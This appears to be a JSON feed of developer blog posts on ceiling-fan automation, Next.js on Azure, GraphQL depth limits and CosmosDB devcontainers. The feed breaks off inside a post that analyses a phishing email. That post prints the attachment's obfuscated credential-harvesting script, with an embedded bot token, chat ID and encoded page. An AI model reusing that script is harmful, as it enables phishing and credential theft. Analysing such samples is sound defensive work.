6 mode: slider The input_boolean is really just tracking if the fan is on or off, and we could probably do that as a calculated value (we’ll see why shortly), but I like to be explicit and it’s not really any overhead. As for the input_number, this is tracking the speed of the fan. My fan has six speeds, but I’ve added a seventh position, 0, which I’m using to indicate off (hence why we could do a calculated value rather than explicit boolean state).\nSince I’ve got four fans in the house, I’m going to use a series of scripts to execute the commands, as I find they are a bit more portable and discoverable - plus I can reuse them outside of the fan entity itself:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 script: fan_off: alias: Turn a fan off fields: fan: description: The fan to turn off example: parents_fan sequence: - service: input_number.set_value data: entity_id: input_number.{{ fan }}_speed value: 0 mode: single icon: mdi:fan-off fan_on: alias: Turn a fan on fields: fan: description: The fan to turn on example: parents_fan sequence: - service: input_number.set_value data: entity_id: input_number.{{ fan }}_speed value: 1 mode: single icon: mdi:fan-speed-1 These scripts are really just wrappers for the specific state, for the off I set the input_number helper to 0, and the way I know which helper to use is by having a convention to the name of the entities, fan is going to be the device name when we learnt the commands, making it quite easy to have reusable scripts.\nNext, let’s create a script to set the speed:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 fan_set_speed: alias: Set the speed of a fan icon: mdi:fan fields: fan: description: The fan to set the speed of example: parents_fan speed: description: The speed of the fan example: "1" sequence: - service: remote.send_command data: device: "{{ fan }}" command: fan_speed_{{ speed | round (0, 'floor') }} target: entity_id: remote.broadlink_rm4_pro - if: - condition: template value_template: "{{ (speed | round (0, 'floor')) == 0 }}" then: - service: input_boolean.turn_off data: entity_id: input_boolean.{{ fan }}_state else: - service: input_boolean.turn_on data: entity_id: input_boolean.{{ fan }}_state - service: input_number.set_value data: entity_id: input_number.{{ fan }}_speed value: "{{ speed }}" mode: single This script will be callable from other scripts and automations and will take two inputs, the fan (which is the device name) and the speed to set. It will then send the command to the Broadlink using the remote.send_command service (like in our testing) and since I suffixed the command names with the speed, we can pull that out nicely, and then we set the on/off state of the fan before updating the input_number helper with the requested speed.\nThe fan entity With our scripts and helpers setup, we can create a fan using the Template Fan integration:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 fan: - platform: template fans: parents_fan: friendly_name: Parents Fan unique_id: parents_fan speed_count: 6 value_template: "{{ states('input_boolean.parents_fan_state') }}" percentage_template: "{{ (100 * (int(states('input_number.parents_fan_speed'))/6)) | round(0, 'floor') }}" turn_off: service: script.fan_off data: fan: parents_fan turn_on: service: script.fan_on data: fan: parents_fan set_percentage: service: script.fan_set_speed_state data: fan: parents_fan speed: "{{ percentage }}" There’s some metadata of the fan, such as the name and entity ID, but then we start computing some values from the helpers we defined above. The value_template will read the state from the input_boolean (and here’s where we could compute it if desired) and then percentage_template is used to turn the speed into a percentage to display on the slider. Since we’re storing the numerical speed (as that maps cleaner to our commands), we need to convert it to a percentage, and I just round it down since sixths isn’t a clean round fraction.\nAdding the turn_on and turn_off actions is easy, they’ll just call the scripts we setup, but the set_percentage is going to require a new script (to avoid the calculations being embedded in the entity):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 fan_set_speed_state: alias: Set the tracking value for the fan speed icon: mdi:fan fields: fan: description: The fan to set the speed of example: parents_fan speed: description: The speed of the fan example: "1" sequence: service: input_number.set_value data: entity_id: input_number.{{ fan }}_speed value: "{{ (speed / 100) * 6 | round(0, 'ceil') }}" This script a generic version of the on/off scripts, it takes the percentage value and converts it to a speed value, and then sets the helper. Having the deal with percentages, especially in my case of numbers that don’t round cleanly, is a bit of a pain, but it’s the best I could come up with.\nAnd with that all setup, we can add it to our UI (I’m using the mushroom cards add-on for the fan card):\nWe’re almost done, but there’s something we still need, to actually call the fan_set_speed, as all we’re doing is setting the input_number helper.\nThe automation To call our script, I’m using an automation that is set to trigger on the input_number changing:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 automation: - id: set_fan_speed alias: "Climate: Set fan speed" trigger: - platform: state entity_id: - input_number.parents_fan_speed action: - service: script.fan_set_speed data: fan: "{{ fan }}" speed: "{{ states(trigger.entity_id) }}" variables: fan: "{{ trigger.entity_id | regex_replace(find='input_number.', replace='', ignorecase=False) | regex_replace(find='_speed', replace='', ignorecase=False) }}" As I integrate more of the fans, I’ll add more of them to the entity_id on the trigger, but we’re starting simple.\nSince we’re going to need the name of the fan for the script, and I was smart enough to put that in the name of the input_number, we can use a regex to pull it from trigger.entity_id and then pass it to the script, while grabbing the state (ie - numerical speed) from the entity that triggered the automation.\nAside: In retrospect, I should have had the device as the suffix of the input_number, rather than in the middle of the entity name, but now I’ve got it everywhere and I’m too lazy to go back and change it.\nNow, whenever something triggers a change to the fan speed value, this automation will be triggered, the script is called and the fan does it’s thing. So far, I’ve set this up with some other automation’s based on the temperature and humidity in the room, as well as a custom Google Assistant routine so I can say “Hey Google, parents fan speed” and it goes faster!\nConclusion I’m pretty happy with how this turned out, especially since I find the “default” UX of these fans really frustrating. In fact, we don’t even have the remotes anywhere in the rooms, they just sit in the downstairs “junk draw” (you know the one!).\nIt’s not a perfect solution though, it doesn’t address the core issue of poor UX completely, as the switch on the wall will still break the circuit, and I can’t track that, so the state can get out of order, we’ve had a few incidents when my wife or kids couldn’t turn on the fan’s light but it was because the switch was off on the wall, so they flipped it since it didn’t respond to a voice command, but that just killed the circuit power so then the state in Home Assistant was out of sync. I’ve got some ideas on how to address that, but I’m waiting for that hardware to arrive before I can try that out.\nBut from an automated house perspective, it works well. We’ve had some humid nights recently and it’s been nice to come to bed to find that the fan is already spinning and we didn’t have to do anything. I’ve also got the light in the fan (which uses the Light Template entity) configured with an automation against the kids lamps, so when we enable the “Night light” effect on them, it’ll turn off the overhead light - and it’s worked about 90% of the time 🤣.\nIf anyone has thoughts on how to improve this, or any other ways they’ve gone about integrating remote controlled ceiling fans, I’d be keen to hear about it!\n", "id": "2022-10-24-building-a-smart-home-part-4-ceiling-fans" }, { "title": "Extending Next.js Support in Azure Static Web Apps", "url": "https://www.aaron-powell.com/posts/2022-10-10-extending-nextjs-support-in-azure-static-web-apps/", "date": "Mon, 10 Oct 2022 06:40:28 +0000", "tags": [ "azure", "javascript", "serverless" ], "description": "We're improving the support for Next.js on Azure Static Web Apps, check out what's new!", "content": "Next.js is one of the most popular JavaScript frameworks for building complex, server-driven React applications, combining the features that make React a useful UI library with server-side rendering, built-in API support and SEO optimizations.\nWith today’s preview release, we’re improving support for Next.js on Azure Static Web Apps.\nWhat’s new In this preview we’re focusing on making zero-config deployments with Next.js even easier than it’s been before by including support for Server-Side Rendering and Incremental Static Regeneration (SSR and ISR respectively), API Routes, advanced image compression, and Next.js Auth. In this post, we want to highlight three features that make building Next.js apps on Azure more powerful.\nServer-Side Rendering When we first launched Static Web Apps, we ensured we had support for Next.js, but our focus on this was Static-Site Generation or SSG. SSG takes the application and compiles static HTML from it that is then served and while SSG is useful in some scenarios it doesn’t support dynamic updates to the content of the page per request.\nThis is where Server-Side Rendering, or SSR, comes in. With SSR you can inject data from a backend data source before the HTML is sent to the client, aka in the pre-rendering phase, allowing for more contextual, real-time updates to the data. Check out Next.js’s docs for more on SSR.\nFor this demo we’ll add a getServerSideProps function to our index.js file that has the current timestamp:\n1 2 3 4 export async function getServerSideProps() { const data = JSON.stringify({ time: new Date() }); return { props: { data } }; } We can then consume this in the component:\n1 2 3 export default function Home({ data }) { const serverData = JSON.parse(data); // snip And then output the date timestamp.\nAPI routes API routes allow us to build a backend API for the client-side components of our Next.js app to communicate with and get data from other systems. These are added to a project by creating an api folder within our Next.js app and defining JavaScript (or TypeScript) files with exported functions that Next.js will turn into APIs that can be called to return JSON to the client.\nAPI routes can be as simple as masking an external service, or as complex as hosting a GraphQL server, which we’re doing in the example below.\nHere you’ll see that we called the API route, /graphql, and got back a GraphQL payload response. You’ll find this sample on GitHub.\nImage optimisation When it comes to ensuring your website is optimized for all web clients, Web Vitals is a valuable measure. To help with this Next.js has an Image component and image optimisation. This feature of Next.js also makes it easier to create responsive images on your website and optimise the image being sent to the browser based off the dimensions of the view port and whether the image is currently visible or not.\nYou can see this in action where we have deployed the Next.js image example.\nDeploying with the new Next.js support When it comes to deploying an application to leverage these Next.js features, you need to select Next.js from the Build Presets and leave the rest of the options as their default, as SSR Next.js applications are the default for Static Web Apps. If you wish to use Next.js as a Static Site Generator, you’ll need to add the environment variable is_static_export to your deployment pipeline and set it to true and the output location set to out.\nCommon Questions Can I still use SSG? Yes! Static rendered Next.js applications are still supported on Static Web Apps, and we encourage you to keep using them if they are the right model for your applications.\nExisting Next.js SSG sites should be unaffected by the launch today, although it is encouraged that you add the is_static_export environment flag to your deployment pipeline, ensuring that Static Web Apps correctly identifies the SSG.\nShould I use SSR over SSG? This is very much an it depends answer. The support announced today for SSR is preview support, meaning that it is not recommended for production workloads, for production we still encourage people to using SSG as their preferred model when working with Next.js. Additionally, echoing the recommendations from Next.js themselves, that SSG should be the preferred model when publishing sites.\nSSG sites have a performance benefit over SSR, as the HTML files are created at build time rather than runtime, meaning there is less work for the server to do when producing content, thus increasing performance.\nBut if you’re looking to use features like dynamic routing, have a very large site that have hundreds (or thousands) of pages, or want to fetch data before sending to the client, SSR will be a better fit for you and worth exploring.\nIf you’re still unsure which approach to use, check out this excellent guide from Next.js themselves.\nCan I use Azure Functions or BYO Backends as well as API routes? No, if you’re deploying a hybrid Next.js application then no additional backend will be available for the site as API routes can be used to achieve much of the same functionality.\nNext steps This is all exciting and if you’re like me and can’t wait to try out the new features, check out the sample repo from this post then head on over to our documentation and get started with your next Next.js application today.\n", "id": "2022-10-10-extending-nextjs-support-in-azure-static-web-apps" }, { "title": "GraphQL on Azure: Part 11 - Avoiding DoS Queries", "url": "https://www.aaron-powell.com/posts/2022-10-10-graphql-on-azure-part-11-avoiding-dos-queries/", "date": "Mon, 10 Oct 2022 00:42:25 +0000", "tags": [ "azure", "graphql" ], "description": "Graphs are great for DoS queries, so how can we prevent them?", "content": "In the previous post in this series we added a new “virtual” field to our GraphQL schema for Post, related:\n1 2 3 4 5 6 7 8 9 10 type Post { id: ID! title: String! url: Url! date: Date tags: [String!]! description: String content: String! related(tag: String): [Post!] } But in doing so, we added a problem, let’s take this query as an example:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 query { posts { related { related { related { related { related { related { related { related { title } } } } } } } } } } Oh dear… What’s going to happen here? Exactly what you think, a series of recursive queries against my API and I’ve just created a Denial of Service, DoS, attack vector against my server (it’s no a DDoS attack since it’s not distributed).\nBut this is perfectly valid from a GraphQL standpoint, it’s just walking the graph which we told it to expose, but I didn’t want it to bring down my server! And while this is a single type GraphQL schema, it would be realistic that in a more complex schema that you’ll have types that can recurse through other types back to the original.\nAzure API Management GraphQL policies Good news, we can solve this ourselves by leveraging APIM policies, this time we’ll use the <validate-graphql-request> policy.\nThis policy is an inbound policy, which means that it’ll be applied before the request is passed to our backend, or in this case, the GraphQL resolver policies, allowing us to intercept and, well, validate it against rules we predefined.\nWe’re going to focus on the two top-level attributes of the policy, max-size and max-depth.\nThe max-size policy is used to enforce an inbound request size limit, say, reject any requested over 100kb, so that you are limiting the amount of data that can be retried in a single request as an excessive query size may result in an excessive database operation being performed.\nWe’ll add this to the <inbound> section of our APIM policy:\n1 2 3 4 5 6 7 <policies> <inbound> <base /> <validate-graphql-request error-variable-name="size" max-size="10240" /> </inbound> <!-- snip --> </policies> This is a useful policy to have in place, especially if you have a large GraphQL schema that exposes a lot of different types and fields, but it’s not really going to solve in our problem, it’ll take quite a lot of nesting to hit the size cap. Instead, we want to use the max-depth part of the policy.\nWith max-depth, we can specify how many levels of nesting a request is allowed to do before we reject the query, let’s update the policy:\n1 2 3 4 5 6 7 <policies> <inbound> <base /> <validate-graphql-request error-variable-name="size" max-size="10240" max-depth="3" /> </inbound> <!-- snip --> </policies> One thing to be away of with max-depth is that it’s using a 1-based index, starting with the GraphQL operation type (query or mutation), meaning that a depth of 3 would allow this:\n1 2 3 4 5 6 7 8 query { postsByTag(tag: "graphql") { title related { title } } } But this query is invalid:\n1 2 3 4 5 6 7 8 9 10 11 query { postsByTag(tag: "graphql") { title related { title related { title } } } } And if you execute the query above it’ll give you a 400 Bad Request status, with the following body:\n1 2 3 4 { "statusCode": 400, "message": "The query is too nested to execute, its depth is more than 3 " } Success! We’ve created a block at the gateway level, meaning that we won’t even worry about the downstream servers being hit by rogue queries.\nConclusion One of the easy to overlook aspects of GraphQL is that you’re working with a graph and you can make recursive references in the graph that can be walked, and exploited, resulting in a DoS attack vector against your backend.\nBut it’s something that we can easily handle with the GraphQL policies in Azure API Management.\nUsing the max-depth part of the <validate-graphql-request> policy will allow us to prevent excessive nesting in the operation performed by a client, and we can combine that with the max-size attribute to avoid large, flat requests.\nThere are other rules that we can set on the policy, such as restricting access to certain resolver fields or paths, but I’ll leave that as an exercise to the reader. 😉\n", "id": "2022-10-10-graphql-on-azure-part-11-avoiding-dos-queries" }, { "title": "Improved Local Dev With CosmosDB and devcontainers", "url": "https://www.aaron-powell.com/posts/2022-08-24-improved-local-dev-with-cosmosdb-and-devcontainers/", "date": "Wed, 24 Aug 2022 00:22:27 +0000", "tags": [ "javascript", "vscode", "cosmosdb" ], "description": "A second take on how to work with CosmosDB's docker-based emulator", "content": "Last year I wrote a post on using the CosmosDB Docker-based emulator with devcontainers and since then I’ve used that pattern many times to build applications, but there was one thing that kept bothering me, having to disable SSL for Node.js.\nSure, disabling SSL with NODE_TLS_REJECT_UNAUTHORIZED wasn’t a huge pain, but it did feel like a dirty little workaround, it also hit a snag - dotnet projects.\nI had the idea that I should add the CosmosDB emulator to the devcontainer used by FSharp.CosmosDb, as I kept deleting the Azure resource that I used between when I was working on it. But when I’d set the account host to https://cosmos:8081 for the connection string, it’d fail to do queries as the self-signed certificate was rejected.\nI guess it’s time to install the certificate.\nThe emulator provides the certificate at a well-known endpoint, which you can get using cURL:\n1 curl -k https://$ipaddr:8081/_explorer/emulator.pem > emulatorcert.crt But when should we run that, and what’s the IP of the Cosmos emulator container?\nInstalling the certificate Because we need to wait until the containers have started, we’ll use the postCreateCommand in the devcontainer.json file, and we’ll have it call a bash script. Here’s the bash script:\n1 2 3 4 5 6 7 8 9 10 11 12 13 #!/usr/bin/env bash set -euxo pipefail ipAddress=https://$(docker inspect cosmos -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}'):8081 # Try to get the emulator cert in a loop until sudo curl -ksf "${ipAddress}/_explorer/emulator.pem" -o '/usr/local/share/ca-certificates/emulator.crt'; do echo "Downloading cert from $ipAddress" sleep 1 done sudo update-ca-certificates To get the IP of the emulator, we’ll use docker inspect and in the docker-compose I set a name for the container, cosmos, so that it’s a well-known name (we could make an assumption of the name, based off the way compose names containers, but this is safest), and we provide a template to grab the IP from the JSON response - {{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}. This is combined with the protocol/port information to make a variable for the IP address to then download and install the certificate as described here.\nSetting the connection info With the certificate installed, it might be convenient to set the connection string information so that it can be used. Initially, I thought to use environment variables (since we have the IP as a bash variable) and load them with the Microsoft.Extensions.Configuration.EnvironmentVariables NuGet package, so we can add a export ipAddress to the end of the bash script (or maybe make the variable something easier to parse into the dotnet config system), but it turns out that you can’t export variables from postCreateCommands (see this issue).\nSince that was off the table, an alternative solution would be to dump the info out as a file on disk. Here’s the dotnet approach for my project, you just have to adapt the file (and its contents) for your project needs:\n1 2 3 4 if [ ! -f ./samples/FSharp.CosmosDb.Samples/appsettings.Development.json ] then echo '{ "Cosmos": { "EndPoint" : "'$ipAddress'" } }' >> ./samples/FSharp.CosmosDb.Samples/appsettings.Development.json fi Note: I have the Access Key for cosmos in the docker-compose file, but you could also dump it out here if you prefer.\nAnd with that, when the container starts, the connection to Cosmos is ready for your application to use.\nSummary In this post we’ve seen how we can run the Docker CosmosDB emulator side-by-side with our app container using a VS Code devcontainer. The full definitions that I published for my project can be found here.\nNow that I’ve figured out how to do this, I’m going to be going back and retrofitting some other repos so that I don’t have to disable SSL validation for Node.js apps, making it more secure to run them locally.\nAddendum After writing this post and going back to some JavaScript/Node.js projects, I found that they were still failing with an invalid certificate and it turns out that if I’d read the docs fully I’d have know this. It seems that while dotnet applications running on Linux respect the certificate store, Node.js apps don’t, so you need to explicitly add the certificate using the NODE_EXTRA_CA_CERTS environment variable, so I’ve added "NODE_EXTRA_CA_CERTS": "/usr/local/share/ca-certificates/emulator.crt" to the remoteEnv section of the devcontainer.json file… sigh.\n", "id": "2022-08-24-improved-local-dev-with-cosmosdb-and-devcontainers" }, { "title": "More Phishing Attempts", "url": "https://www.aaron-powell.com/posts/2022-08-23-more-phishing-attempts/", "date": "Tue, 23 Aug 2022 00:31:33 +0000", "tags": [ "security" ], "description": "Another day, another phish", "content": "Well, that was quick, less than a week since my last one and here we go again.\nFor transparency, this one did actually land in my junk mail, so I wouldn’t have seen it if I hadn’t been looking for an email that I should’ve received (totally unrelated to getting phished though 🤣), but since I did see it, it’s time to dig into it again!\nThe premise of this one is the same as the last one, although the email was much more brief, only containing my email address in the body and the HTML file attachment.\nSpeaking of the HTML, it was a bit different this time:\n1 <script>var e\\u006dail="<yes, my email was here>";var tok\\u0065\\u006e='5\\x374\\062\\u0038\\0607394\\u003a\\u0041AEY\\171\\x56gRLp3\\132YYweU\\161\\144cbUdsGWj\\163\\x6e-\\x53k\\063w\\u0030';var c\\u0068a\\u0074\\u005fid=5486255038;var d\\u0061ta=ato\\u0062("PC\\x46\\105T0\\x4eUWV\\102\\106IGh0bWw+Cjxod\\x471sIGRp\\143\\x6a0ibHRyIiBjbGFzc\\x7a0iI\\x69B\\x73\\131W\\x35nPSJlb\\u0069I\\053CiAg\\111C\\x41\\x38a\\107VhZD4KIC\\x41g\\u0049DxtZXRh\\111Gh\\x30dHAt\\132XF1aXY9I\\153NvbnR\\x6cbnQtVHlw\\132\\123Ig\\u005929udGVudD0i\\144G\\x564\\u0064C9od\\x47\\u0031sOy\\u0042\\152aG\\106y\\x632V0PVVURi04I\\x6a4\\x4bICAgID\\u0078\\x30a\\u0058RsZ\\x545\\124\\141Wdu\\111Gl\\x75\\u0049HR\\166\\x49H\\154v\\144XI\\x67YWNj\\1423Vu\\x64DwvdG\\u006c0bGU+C\\x69\\x41gICA8bWV0YSB\\x6fd\\x48Rw\\114\\127\\126\\170dWl2PS\\x4a\\u0059\\114VVBL\\x55N\\166\\x62X\\x42hdG\\x6c\\151bGUiIGNvb\\x6e\\122\\u006c\\u0062nQ9I\\x6b\\154FPW\\x56\\x6bZ2U\\151Pg\\157gICAg\\120G1ldG\\x45\\147\\u0062m\\u0046\\x74\\x5aT\\u0030idmlld3B\\u0076cn\\u0051iIG\\u004ev\\x62n\\x52\\x6cbnQ9\\x49n\\144\\160ZHRo\\u0050WR\\154\\x64\\x6d\\154jZS13aW\\122\\x30aC\\167gaW\\x35p\\144\\x47lhbC1z\\x592FsZT0x\\x4cj\\x41s\\x49G\\u0031\\150eG\\u006ct\\144W0\\x74c2NhbGU9M\\1514\\167\\u004cCB1\\x632VyLXN\\u006aYW\\170\\u0068Y\\155x\\154PXllcy\\111\\x2bCi\\x41gICA\\u0038c\\u0032Ny\\x61X\\u00420IHNyY\\u007a\\u0030\\151a\\110\\x520cHM6Ly9ha\\x6d\\1064Lm\\144vb\\u0032d\\163ZW\\106wa\\130M\\165Y29tL2FqYX\\u0067vbG\\154icy9qcX\\u0056\\154\\143n\\u006bv\\115y40\\114j\\x45vanF1\\x5a\\x58J\\u0035Lm\\061\\160b\\u00695\\x71\\x63\\u0079I\\u002bPC\\071zY3J\\x70cHQ+\\u0043iA\\x67\\111C\\x418bG\\x6cuayByZWw\\u0039\\111\\x6e\\u004eob\\063J\\060Y\\063V0IGlj\\1422\\x34i\\111Ghy\\132WY9Imh0\\144HBzOi\\u0038vY\\x57F\\153\\x59\\u0032Ru\\114m1\\u007aZn\\x52h\\144\\130R\\157L\\1555l\\u0064C\\x39z\\141GFyZW\\121v\\u004dS4\\u0077\\x4c2Nvb\\x6eR\\154bnQva\\x57\\061\\x68Z\\062VzL\\x32Zh\\x64ml\\u006a\\u00622\\065fYV9l\\x64XBh\\u0065WZnZ2hx\\141\\x57FpN\\062s5c29\\x73\\116\\155\\170\\x6e\\u004di5\\x70Y\\062\\070\\151\\120iA\\x67\\u0049C\\x41KIC\\x41\\147\\111D\\170saW5\\x72I\\x47\\122hdG\\105tbG\\071hZ\\u0047\\u0056yPSJj\\132\\1074iIGNyb3Nzb3J\\160Z2l\\165PS\\112hbm9u\\u0065W1vdXMiIGh\\u0079\\x5a\\x57Y9Imh\\x30\\144HBz\\117i8vYW\\x46\\153Y\\062R\\165Lm1zZn\\x52h\\x64XRoL\\u006d5ld\\x43\\x39l\\x633R\\172\\114\\x7a\\111\\x75\\x4dS9jb\\062\\x350\\132W50L2NkbmJ1b\\x6d\\122\\163ZXM\\166Y29\\165\\144m\\x56yZ2Vk\\x4c\\156\\u0059yLm\\170vZ\\062\\154u\\114\\u006d1pb\\x6c\\0716a\\u0058\\154\\u0030\\132j\\u0068kenQ5ZWcxczYtb\\u0032hobGV\\156M\\x695jc3M\\x69IH\\x4albD\\060ic3R5bGVza\\107Vld\\103\\111+CiAg\\x49C\\u00418\\x63\\062\\u004eya\\130\\x420Pg\\u006fg\\x49C\\101gICAg\\x49CQ\\157ZG\\071\\x6a\\u0064\\1271l\\x62\\156Qp\\x4c\\x6eJl\\x59\\127R5\\u004bG\\1321bm\\1160\\x61\\x579\\165KC\\x6bgeyQ\\157\\u0049iNkaXNwb\\x47F5Tm\\106tZ\\123IpLmVt\\143\\u0048\\1225\\113CkuY\\130Bw\\132\\1275\\u006bK\\x47VtYW\\u006c\\163\\113TsgJ\\1035nZX\\x52\\x4bU\\0609OKCJodHRwcz\\x6f\\x76L2\\u0046\\167a\\u00535pcG\\x6cm\\x65S5v\\x63mc\\x2f\\132m9yb\\127\\u00460PWp\\u007ab\\0624\\x69L\\x43Bm\\x64W5jdGlv\\142ihkYXRhK\\x53\\102\\067JCg\\u0069\\111\\062\\x64m\\u005ayIp\\x4cmh0bWwo\\x5aGF0YS5\\160cCk7fSl\\071\\x4b\\124s\\x4bIC\\101\\x67\\111Dw\\166\\u00632\\116\\171aX\\1020\\x50go8L2\\150\\x6cY\\127Q+\\103jxib2R5IGN\\x73YXNz\\120SJ\\x6aYiIgc3R\\065bGU9I\\x6d\\122pc3B\\163YX\\1536IGJ\\x73b2Nr\\x4f\\171\\x49+Cjx\\x77IGlkPS\\u004an\\132m\\u0063iIHN0e\\127x\\u006cPSJ\\153\\x61\\x58\\116w\\x62\\x47\\x465O\\151Bu\\x62\\0625\\x6cOy\\x49\\x2bPC9\\167\\120go8Zm9y\\142S\\102uYW1\\154P\\123JmM\\123Iga\\127Q9\\u0049m\\x6bw\\u004djgx\\x49\\151Bub3Z\\x68bG\\x6ckY\\x58Rl\\120\\x53Jub3\\x5ah\\u0062G\\154kYXRlI\\x69\\x42zc\\x47\\126\\x73bGNoZ\\127NrP\\u0053\\x4a\\155YWx\\x7a\\132SI\\x67\\142WV0aG\\071kPS\\u004awb3N0I\\x69\\u0042\\060Y\\130J\\u006eZ\\x58Q9\\111l9\\060b3AiIG\\106\\061\\u0064G\\u0039jb21\\167\\u0062GV0\\u005a\\x54\\u0030ib\\x32ZmI\\151BhY\\063\\122pb24\\x39IiI+CiAgIC\\x41\\070\\132Gl\\x32IG\\u004esYX\\116z\\120SJsb\\x32\\144\\x70bi1\\167YWd\\u0070bmF\\060ZWQtc\\x47FnZ\\123I+\\x43i\\101\\147ICAgICAg\\u0050\\107R\\u0070d\\151\\x42pZD0ib\\107l\\u006eaH\\x52ib3\\150UZW1wbGF\\060Z\\125NvbnR\\u0068\\141\\1275lc\\u0069I\\x2b\\x43jxkaXY\\147aWQ9\\x49mxpZ\\x32\\u00680\\x59m\\x39\\064QmFj\\141\\062\\144y\\u00623V\\x75Z\\u0045\\116v\\x62nRhaW5\\u006cci\\x49+C\\u0069AgICA8ZGl2I\\107NsYX\\116z\\120SJiYWNrZ3JvdW\\x35kLWltYWd\\154\\114W\\x68\\x76b\\107R\\u006c\\x63i\\x49gcm9\\163Z\\x540icHJ\\154c\\x32VudGF0aW9uI\\x6a4KICA\\x67ID\\x78\\x6ba\\x58YgY2\\x78h\\x633\\x4d\\071\\u0049m\\112\\150Y2\\164ncm\\x391b\\x6dQt\\x61W1hZ2U\\x67ZX\\1500LW\\112\\x68\\x592tn\\143\\15591bmQ\\164aW1\\x68\\x5a2UiIH\\1160eWx\\154\\x50\\123JiYWN\\x72Z3\\112vd\\1275kLWltY\\u0057dl\\117\\151\\x42\\u0031\\x63\\x6dw\\x6fJnF1\\u0062\\x33Q\\x37aHR0cH\\115\\066L\\x799h\\x59\\x57\\x52\\x6aZG4ubX\\116mdGF1dG\\x67u\\x62mV\\060L3\\116oYXJl\\132\\103\\x38x\\x4c\\x6aAv\\x5929u\\144G\\u0056\\165\\u0064C\\x39pbWFnZ\\130\\u004dvYmFj\\x612d\\171b3VuZHMvM\\1549i\\u0059zN\\u006b\\115z\\112hN\\152k\\062O\\u0044k\\u0031\\x5a\\152c\\x34YzE\\u0035\\132G\\1312Y\\172\\143\\u0078NzU\\064NmE1ZC\\x35zdmcmcXVv\\u0064\\u0044s\\160OyI\\053PC\\x39kaX\\131+Cjwv\\x5aGl2Pjwv\\132Gl2P\\x67o\\x38\\u005aGl\\x32\\x49GNsYX\\x4ezPSJv\\x64X\\122lc\\151I\\x2bC\\151AgI\\u0043A8\\x5aG\\154\\u0032IGN\\x73YXN\\x7a\\120\\123J0ZW1w\\x62\\107F0\\132S1zZ\\127N\\060aW\\x39uI\\x471haW4\\164c2\\x56\\152\\144Glvb\\151I\\u002b\\x43iAg\\111C\\u0041\\147IC\\x41\\x67\\u0050\\x47Rp\\u0064iBjb\\x47\\u0046zcz0\\x69bW\\u006ck\\x5a\\x47\\x78l\\x49G\\x564dC\\x31t\\x61W\\122\\u006bbGUiP\\x67ogICA\\u0067\\111CAgIC\\101gI\\103\\u00418Z\\107l2IGN\\u0073\\x59\\130Nz\\120SJmdW\\170sLWhlaWd\\u006f\\144C\\x49\\u002bCj\\170\\u006b\\x61\\x58Y\\147Y2xhc3M9I\\u006dZ\\163Z\\130gtY\\062\\u0039\\u0073d\\1271\\u0075\\x49j4\\x4bICA\\u0067ID\\u0078k\\x61XYgY2x\\u0068\\u00633\\1159\\u0049nd\\160bi1zY3Jv\\142Gwi\\x50gogI\\103\\x41gICAg\\u0049Dx\\x6baX\\131\\147a\\u0057Q9Imx\\160\\x5a2h0Ym94I\\151\\u0042jbGF\\172\\143z0\\151c2\\154nb\\x691pb\\x691i\\u00623\\147\\x67ZXh0LXN\\160Z24ta\\127\\u0034t\\x59m\\x394IGZ\\u0068ZG\\u0055taW4\\164\\x62G\\154\\x6ea\\u0048Ri\\1423gi\\120gog\\x49\\103A\\x67IC\\101\\x67\\u0049\\104\\x78k\\141XY+PG\\154t\\132yBjbG\\x46\\x7ac\\1720ib\\u00479\\u006eb\\171Igcm\\u0039\\163\\u005a\\u00540ia\\x571\\156IiB\\x77b\\x6d\\x64zcm\\x4d9I\\x6dh0\\x64H\\u0042\\x7a\\x4f\\1518vYW\\x46\\x6bY2R\\x75Lm\\x31\\172Z\\156RhdX\\122\\x6f\\114m5\\u006c\\x64C\\x39za\\107\\106yZWQv\\x4dS4\\x77L\\062Nvb\\x6e\\x52lb\\u006e\\121\\u0076a\\x571\\150\\x5a2V\\u007aL2\\u0031\\x70\\131\\063\\112vc\\x329\\155dF\\071s\\142\\x32\\x64\\u0076\\x582Vk\\x4fWM\\x35\\132W\\u0049\\x77ZGNl\\115TdkNzU\\x79YmVkZWE2YjVhY\\062\\122hNmQ5\\x4cnBu\\x5ay\\111gc3Znc3J\\x6a\\x50SJodHR\\167\\143zo\\166L2\\x46\\x68\\u005aGNkbi5\\164\\x632Z\\060\\x59XV0aC5u\\132\\130\\x51vc\\x32hhcm\\126kL\\x7aE\\165M\\x439jb2\\x350ZW50\\1142lt\\131\\127\\144l\\u0063y9t\\141\\x57N\\171\\x623NvZ\\x6eRfb\\u00479\\u006e\\14219lZ\\124\\126j\\x4f\\107Q5\\132mI2M\\152Q\\x34YzkzOGZ\\153MGRjMTkz\\x4ezBlO\\124B\\x69ZC5z\\x64m\\u0063iI\\110NyYz0\\x69\\x61HR0c\\u0048M6Ly9hY\\127RjZG\\x34ubXN\\155dGF1\\144\\x47\\x67\\x75bm\\126\\x30L3\\116\\157Y\\130JlZC\\u0038\\x78LjAv\\x5929ud\\107\\u0056u\\144\\1039p\\x62W\\x46nZX\\115vbW\\154jcm9z\\x622Z\\x30X2\\170vZ29fZWU\\061\\u0059\\172hk\\x4fWZiN\\u006aI\\u0030OGM5MzhmZDBkYzE5Mzcw\\132Tkw\\131m\\121uc\\x33ZnIiBh\\x62\\110\\u00519Ik\\061pY3Jv\\u00632\\u0039\\x6d\\u0064\\103I+PC9\\x6ba\\u0058Y\\u002b\\x43\\x69AgICA\\u0067IC\\x41g\\u0050GRpdiByb2\\170\\154\\120S\\x4a\\x74Y\\127luIj4KPGR\\x70\\x64\\x69BjbGF\\172cz0\\151Y\\u0057\\065pb\\u0057F\\060ZS\\102\\x7a\\142\\107\\x6ck\\132S1pbi1uZXh0\\111j\\064\\u004bICAgIC\\x41\\x67ICA8ZGl2\\111D4KPG\\x52pdi\\x42\\152\\142G\\106\\172c\\x7a\\x30\\x69\\u0061WRlbn\\x52\\160dHl\\103\\x59\\127\\065\\165Z\\130\\x49\\x69Pgo\\x67\\x49CAgPGR\\u0070di\\102p\\u005aD\\x30iZG\\x6c